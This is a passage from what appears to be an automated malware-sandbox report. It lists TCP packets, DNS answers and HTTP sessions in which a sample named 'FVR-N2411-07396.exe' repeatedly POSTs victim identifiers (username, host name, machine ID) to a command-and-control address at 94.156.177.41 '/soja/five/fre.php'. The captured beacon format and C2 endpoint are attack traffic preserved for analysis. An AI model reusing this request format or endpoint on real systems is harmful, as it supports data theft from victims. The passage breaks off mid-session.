Nov 28, 2024 13:53:30.067359924 CET	49897	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:30.067359924 CET	49897	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:30.188658953 CET	80	49897	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:30.402465105 CET	49902	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:30.523427963 CET	80	49902	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:30.523536921 CET	49902	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:30.555847883 CET	49902	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:30.675832987 CET	80	49902	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:30.675909996 CET	49902	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:30.796256065 CET	80	49902	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:32.107141972 CET	80	49902	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:32.107192993 CET	80	49902	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:32.107302904 CET	49902	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:32.107379913 CET	49902	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:32.227330923 CET	80	49902	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:32.247689009 CET	49908	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:32.368060112 CET	80	49908	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:32.368160963 CET	49908	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:32.370172977 CET	49908	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:32.490528107 CET	80	49908	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:32.490597963 CET	49908	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:32.612365961 CET	80	49908	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:33.909647942 CET	80	49908	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:33.909887075 CET	80	49908	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:33.909974098 CET	49908	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:33.910015106 CET	49908	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:34.031646967 CET	80	49908	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:34.068587065 CET	49913	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:34.190502882 CET	80	49913	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:34.190700054 CET	49913	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:34.192893982 CET	49913	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:34.319197893 CET	80	49913	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:34.319262028 CET	49913	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:34.439359903 CET	80	49913	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:35.791979074 CET	80	49913	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:35.792109013 CET	49913	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:35.792176008 CET	80	49913	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:35.792231083 CET	49913	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:35.912158966 CET	80	49913	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:35.931873083 CET	49917	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:36.051887989 CET	80	49917	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:36.052036047 CET	49917	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:36.054059029 CET	49917	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:36.174204111 CET	80	49917	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:36.174268961 CET	49917	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:36.296370029 CET	80	49917	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:37.671386003 CET	80	49917	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:37.671478987 CET	49917	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:37.671545029 CET	80	49917	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:37.671595097 CET	49917	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:37.791691065 CET	80	49917	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:37.807044983 CET	49923	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:37.927257061 CET	80	49923	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:37.927434921 CET	49923	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:37.929605961 CET	49923	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:38.049577951 CET	80	49923	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:38.049670935 CET	49923	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:38.169733047 CET	80	49923	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:39.517520905 CET	80	49923	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:39.517673016 CET	49923	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:39.517822027 CET	80	49923	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:39.517875910 CET	49923	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:39.637803078 CET	80	49923	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:39.650813103 CET	49928	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:39.770937920 CET	80	49928	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:39.771184921 CET	49928	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:39.773238897 CET	49928	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:39.893312931 CET	80	49928	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:39.893532991 CET	49928	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:40.018708944 CET	80	49928	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:41.214277029 CET	80	49928	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:41.214318037 CET	80	49928	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:41.214370966 CET	49928	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:41.330753088 CET	49928	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:41.452205896 CET	80	49928	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:41.795041084 CET	49931	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:41.915349960 CET	80	49931	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:41.915452957 CET	49931	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:41.917542934 CET	49931	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:42.038815022 CET	80	49931	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:42.038877010 CET	49931	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:42.159024000 CET	80	49931	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:43.432657003 CET	80	49931	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:43.433051109 CET	49931	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:43.433116913 CET	80	49931	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:43.433171034 CET	49931	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:43.571810961 CET	49936	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:43.586239100 CET	80	49931	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:43.691963911 CET	80	49936	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:43.692066908 CET	49936	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:43.694153070 CET	49936	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:43.814394951 CET	80	49936	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:43.814507961 CET	49936	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:43.934629917 CET	80	49936	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:45.291156054 CET	80	49936	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:45.291275024 CET	80	49936	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:45.291368961 CET	49936	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:45.291497946 CET	49936	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:45.416486025 CET	80	49936	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:45.431333065 CET	49942	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:45.554757118 CET	80	49942	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:45.555039883 CET	49942	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:45.557185888 CET	49942	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:45.677129984 CET	80	49942	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:45.677206993 CET	49942	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:45.797228098 CET	80	49942	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:47.149077892 CET	80	49942	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:47.149209023 CET	49942	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:47.149224997 CET	80	49942	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:47.149283886 CET	49942	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:47.269320965 CET	80	49942	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:47.290548086 CET	49948	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:47.435441017 CET	80	49948	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:47.435631990 CET	49948	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:47.437643051 CET	49948	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:47.609695911 CET	80	49948	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:47.609817028 CET	49948	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:47.729849100 CET	80	49948	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:48.834009886 CET	80	49948	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:48.834119081 CET	49948	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:48.834598064 CET	80	49948	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:48.834650993 CET	49948	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:48.954029083 CET	80	49948	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:48.980740070 CET	49951	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:49.101228952 CET	80	49951	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:49.101320982 CET	49951	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:49.103429079 CET	49951	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:49.229300022 CET	80	49951	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:49.229391098 CET	49951	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:49.349370003 CET	80	49951	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:50.737694979 CET	80	49951	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:50.737812042 CET	49951	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:50.737826109 CET	80	49951	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:50.737884045 CET	49951	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:50.857824087 CET	80	49951	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:50.885303020 CET	49954	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:51.005997896 CET	80	49954	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:51.006102085 CET	49954	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:51.008164883 CET	49954	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:51.134726048 CET	80	49954	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:51.134807110 CET	49954	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:51.258780956 CET	80	49954	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:52.603863001 CET	80	49954	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:52.603990078 CET	49954	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:52.604031086 CET	80	49954	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:52.604087114 CET	49954	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:52.724013090 CET	80	49954	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:52.745637894 CET	49959	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:52.865706921 CET	80	49959	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:52.865808010 CET	49959	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:52.867790937 CET	49959	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:52.989197016 CET	80	49959	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:52.989362955 CET	49959	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:53.109368086 CET	80	49959	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:54.504672050 CET	80	49959	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:54.504785061 CET	49959	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:54.504843950 CET	80	49959	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:54.504894018 CET	49959	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:54.624744892 CET	80	49959	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:54.650748014 CET	49965	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:54.770740986 CET	80	49965	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:54.770855904 CET	49965	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:54.772973061 CET	49965	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:54.895523071 CET	80	49965	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:54.895597935 CET	49965	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:55.015558004 CET	80	49965	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:56.356708050 CET	80	49965	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:56.356807947 CET	49965	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:56.357050896 CET	80	49965	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:56.357095957 CET	49965	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:56.476885080 CET	80	49965	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:56.524355888 CET	49970	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:56.644558907 CET	80	49970	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:56.644659996 CET	49970	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:56.646739006 CET	49970	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:56.768088102 CET	80	49970	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:56.768163919 CET	49970	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:56.888096094 CET	80	49970	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:58.089629889 CET	80	49970	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:58.089737892 CET	49970	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:58.089757919 CET	80	49970	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:58.089822054 CET	49970	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:58.209769964 CET	80	49970	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:58.227514982 CET	49975	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:58.350323915 CET	80	49975	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:58.350404024 CET	49975	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:58.352627993 CET	49975	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:58.472846031 CET	80	49975	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:58.476191998 CET	49975	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:58.596214056 CET	80	49975	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:59.992137909 CET	80	49975	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:59.992228031 CET	49975	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:53:59.992415905 CET	80	49975	94.156.177.41	192.168.2.5
Nov 28, 2024 13:53:59.992458105 CET	49975	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:00.112159967 CET	80	49975	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:00.152575016 CET	49979	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:00.413975954 CET	80	49979	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:00.414047956 CET	49979	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:00.416253090 CET	49979	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:00.536174059 CET	80	49979	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:00.536336899 CET	49979	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:00.656543016 CET	80	49979	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:01.812099934 CET	80	49979	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:01.812285900 CET	49979	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:01.812292099 CET	80	49979	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:01.812346935 CET	49979	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:01.933027029 CET	80	49979	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:01.949193954 CET	49984	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:02.069211960 CET	80	49984	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:02.069312096 CET	49984	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:02.071367025 CET	49984	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:02.191329002 CET	80	49984	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:02.191446066 CET	49984	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:02.311425924 CET	80	49984	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:03.511610985 CET	80	49984	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:03.511707067 CET	49984	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:03.511734009 CET	80	49984	94.156.177.41	192.168.2.5
Nov 28, 2024 13:54:03.511879921 CET	49984	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:54:03.631690979 CET	80	49984	94.156.177.41	192.168.2.5

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 28, 2024 13:52:16.496381044 CET	1.1.1.1	192.168.2.5	0x7c7b	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 28, 2024 13:52:16.496381044 CET	1.1.1.1	192.168.2.5	0x7c7b	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:04.359332085 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 180 Connection: close
Nov 28, 2024 13:52:04.479690075 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons040965ALFONS-PCk0FDD42EE188E931437F4FBE2CHQTve
Nov 28, 2024 13:52:05.944139957 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:06.283209085 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 180 Connection: close
Nov 28, 2024 13:52:06.410511017 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons040965ALFONS-PC+0FDD42EE188E931437F4FBE2CEcRqK
Nov 28, 2024 13:52:07.903688908 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:08.114020109 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:08.237689018 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:09.514312029 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:09.952279091 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:10.072483063 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:11.594536066 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:11.853466988 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:11.973666906 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:13.292371988 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49714	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:13.569083929 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:13.689498901 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:15.014285088 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49715	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:15.273422003 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:15.393769979 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:16.818991899 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
